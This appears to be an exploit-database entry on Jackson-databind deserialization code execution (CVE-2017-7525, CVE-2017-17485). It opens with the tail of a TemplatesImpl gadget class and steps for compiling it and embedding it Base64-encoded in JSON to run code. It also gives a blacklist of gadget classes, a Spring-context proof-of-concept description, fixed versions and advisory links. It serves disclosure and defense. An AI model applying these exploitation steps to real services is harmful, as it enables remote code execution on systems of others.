com.sun.org.apache.xml.internal.serializer.SerializationHandler handler) { } @Override public void transform(com.sun.org.apache.xalan.internal.xsltc.DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] handler) { } } ``` This code can be compiled with the javac compiler, and then the resulting .class file should be Base64 encoded, and provided to the transletBytecodes field in the JSON document. As soon as the document is processed, it will create the object, load the code, and execute it. You may still see errors from code failing after the code executes, such as from type-mismatches or the like. ### Limiting Attack Surface This is just one technique to exploit this flaw, there are many others available. To mitigate the issue, at least in part, Jackson has been modified with a blacklist of types known to be useful gadgets for this type of attack: * org.apache.commons.collections.functors.InvokerTransformer * org.apache.commons.collections.functors.InstantiateTransformer * org.apache.commons.collections4.functors.InvokerTransformer * org.apache.commons.collections4.functors.InstantiateTransformer * org.codehaus.groovy.runtime.ConvertedClosure * org.codehaus.groovy.runtime.MethodClosure * org.springframework.beans.factory.ObjectFactory * com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl * org.apache.xalan.xsltc.trax.TemplatesImpl * com.sun.rowset.JdbcRowSetImpl * java.util.logging.FileHandler * java.rmi.server.UnicastRemoteObject * org.springframework.aop.support.AbstractBeanFactoryPointcutAdvisor * org.springframework.beans.factory.config.PropertyPathFactoryBean * com.mchange.v2.c3p0.JndiRefForwardingDataSource * com.mchange.v2.c3p0.WrapperConnectionPoolDataSource There are likely others that can be used in similar ways to gain code execution that haven’t become well-known yet, so this doesn’t eliminate the problem, it just makes it less likely. id SSV:92962 last seen 2017-11-19 modified 2017-04-17 published 2017-04-17 reporter Root title Jackson enableDefaultTyping method of deserialization code execution vulnerability(CVE-2017-7525) bulletinFamily exploit description ### jackson-rce-via-spel An example project that exploits the default typing issue in Jackson-databind (https://github.com/FasterXML/jackson-databind) via Spring application contexts and expressions ### Context The Jackson-databind project has a feature called default-typing (not enabled by default). When the target class has some polymorph fields inside (such as interfaces, abstract classes or the Object base class), the library can include type info into the JSON structure and use that info at unmarshalling. This can be dangerous when the input is controlled by an attacker and the target class contains a field of type Object or something general (like Comparable). How likely is this? I'm naive, so I hope Java developers don't degrade a type-safe language to the level of an interpreted type-unsafe language by (ab)using Objects as base classes... But I wouldn't be surprised if one day some huge enterprise software would be exploited one day via this vulnerability. After the original discoveries (CVE-2017-7525) had been reported, the author patched this attack surface with a blacklist, which was incomplete (as by nature of blacklists). This proof-of-concept project is a follow-up to demonstrate one more way of exploitation; by abusing Spring classes via Jackson, this could lead to remote code execution. Note: FileSystemXmlApplicationContext is happy to fetch the specified Spring context from anywhere, even from remote location via http. MITRE assigned CVE-2017-17485 to this vulnerability. ### Affected versions The following ones (inclusive) and older: 2.9.3, 2.7.9.1, 2.8.10 ### Mitigation The fixed versions 2.7.9.2, 2.8.11 and 2.9.3.1 (which is to be released at time of writing these lines) expanded the blacklist once again so that Spring application contexts cannot be instantiated anymore. The new major version (3.x) of Jackson-databind will address this topic via a new API layer that provides a way to achieve whitelisting-based serialization for these polymorph classes. id SSV:97076 last seen 2018-01-12 modified 2018-01-11 published 2018-01-11 reporter Root title Jackson-databind 远程代码执行漏洞(CVE-2017-17485)
References
- https://github.com/FasterXML/jackson-databind/issues/1599
- https://github.com/FasterXML/jackson-databind/issues/1723
- https://bugzilla.redhat.com/show_bug.cgi?id=1462702
- https://www.debian.org/security/2017/dsa-4004
- https://security.netapp.com/advisory/ntap-20171214-0002/
- https://access.redhat.com/errata/RHSA-2017:3458
- https://access.redhat.com/errata/RHSA-2017:3456
- https://access.redhat.com/errata/RHSA-2017:3455
- https://access.redhat.com/errata/RHSA-2017:3454
- https://access.redhat.com/errata/RHSA-2017:3141
- https://access.redhat.com/errata/RHSA-2017:2638
- https://access.redhat.com/errata/RHSA-2017:2637
- https://access.redhat.com/errata/RHSA-2017:2636
- https://access.redhat.com/errata/RHSA-2017:2635
- https://access.redhat.com/errata/RHSA-2017:2633
- https://access.redhat.com/errata/RHSA-2017:2547
- https://access.redhat.com/errata/RHSA-2017:2546
- https://access.redhat.com/errata/RHSA-2017:2477
- https://access.redhat.com/errata/RHSA-2017:1840
- https://access.redhat.com/errata/RHSA-2017:1839
- https://access.redhat.com/errata/RHSA-2017:1837
- https://access.redhat.com/errata/RHSA-2017:1836
- https://access.redhat.com/errata/RHSA-2017:1835
- https://access.redhat.com/errata/RHSA-2017:1834
- http://www.securitytracker.com/id/1039947
- http://www.securitytracker.com/id/1039744
- http://www.securityfocus.com/bid/99623
- https://cwiki.apache.org/confluence/display/WW/S2-055
- https://access.redhat.com/errata/RHSA-2018:0294
- http://www.securitytracker.com/id/1040360
- https://access.redhat.com/errata/RHSA-2018:0342
- http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
- https://access.redhat.com/errata/RHSA-2018:1450
- https://access.redhat.com/errata/RHSA-2018:1449
- http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbhf03902en_us
- http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
- https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html
- https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
- https://access.redhat.com/errata/RHSA-2019:0910
- https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
- https://access.redhat.com/errata/RHSA-2019:2858
- https://access.redhat.com/errata/RHSA-2019:3149
- https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html
- https://lists.debian.org/debian-lts-announce/2020/08/msg00039.html
- https://www.oracle.com/security-alerts/cpuoct2020.html
- https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E
- https://lists.apache.org/thread.html/f60afd3c7e9ebaaf70fad4a4beb75cf8740ac959017a31e7006c7486%40%3Cdev.lucene.apache.org%3E
- https://lists.apache.org/thread.html/3c87dc8bca99a2b3b4743713b33d1de05b1d6b761fdf316224e9c81f%40%3Cdev.lucene.apache.org%3E
- https://lists.apache.org/thread.html/c2ed4c0126b43e324cf740012a0edd371fd36096fd777be7bfe7a2a6%40%3Cdev.lucene.apache.org%3E
- https://lists.apache.org/thread.html/c10a2bf0fdc3d25faf17bd191d6ec46b29a353fa9c97bebd7c4e5913%40%3Cdev.lucene.apache.org%3E
- https://lists.apache.org/thread.html/b1f33fe5ade396bb903fdcabe9f243f7692c7dfce5418d3743c2d346%40%3Cdev.lucene.apache.org%3E
- https://lists.apache.org/thread.html/4641ed8616ccc2c1fbddac2c3dc9900c96387bc226eaf0232d61909b%40%3Ccommits.cassandra.apache.org%3E
- https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3Ccommits.druid.apache.org%3E
- https://lists.apache.org/thread.html/5008bcbd45ee65ce39e4220b6ac53d28a24d6bc67d5804e9773a7399%40%3Csolr-user.lucene.apache.org%3E
- https://lists.apache.org/thread.html/c9d5ff20929e8a3c8794facf4c4b326a9c10618812eec356caa20b87%40%3Csolr-user.lucene.apache.org%3E
- https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629%40%3Csolr-user.lucene.apache.org%3E
- https://lists.apache.org/thread.html/r68acf97f4526ba59a33cc6e592261ea4f85d890f99e79c82d57dd589%40%3Cissues.spark.apache.org%3E
- https://lists.apache.org/thread.html/rf7f87810c38dc9abf9f93989f76008f504cbf7c1a355214640b2d04c%40%3Ccommits.cassandra.apache.org%3E
- https://lists.apache.org/thread.html/r42ac3e39e6265db12d9fc6ae1cd4b5fea7aed9830dc6f6d58228fed7%40%3Ccommits.cassandra.apache.org%3E